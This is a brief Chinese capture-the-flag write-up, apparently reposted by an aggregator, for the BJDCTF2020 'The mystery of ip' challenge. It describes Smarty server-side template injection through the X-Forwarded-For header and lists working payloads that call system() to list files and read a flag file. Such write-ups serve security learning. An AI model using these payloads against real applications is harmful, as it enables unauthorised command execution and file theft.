[BJDCTF2020]The mystery of ip

Posted mech

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了[BJDCTF2020]The mystery of ip相关的知识,希望对你有一定的参考价值。

知识点

  • SSTI
  • smarty

抓包,根据题目猜想X-Forwarded-For处可能有问题,测试了一下,存在模板注入


技术图片

 

测试了一下,是smarty注入
smarty注入payload

{if phpinfo()}{/if}
{if system(ls)}{/if}
{ readfile(/flag) }
{if show_source(/flag)}{/if}
{if system(cat ../../../flag)}{/if} #本题payload

 

flag.php是假的,真正的flag在根目录下的flag文件中

 

技术图片

以上是关于[BJDCTF2020]The mystery of ip的主要内容,如果未能解决你的问题,请参考以下文章

[BJDCTF2020]The mystery of ip

[BJDCTF2020]The mystery of ip

[BJDCTF2020]The mystery of ip

[BJDCTF2020]The mystery of ip

[BJDCTF2020]The mystery of ip

[BJDCTF2020]The mystery of ip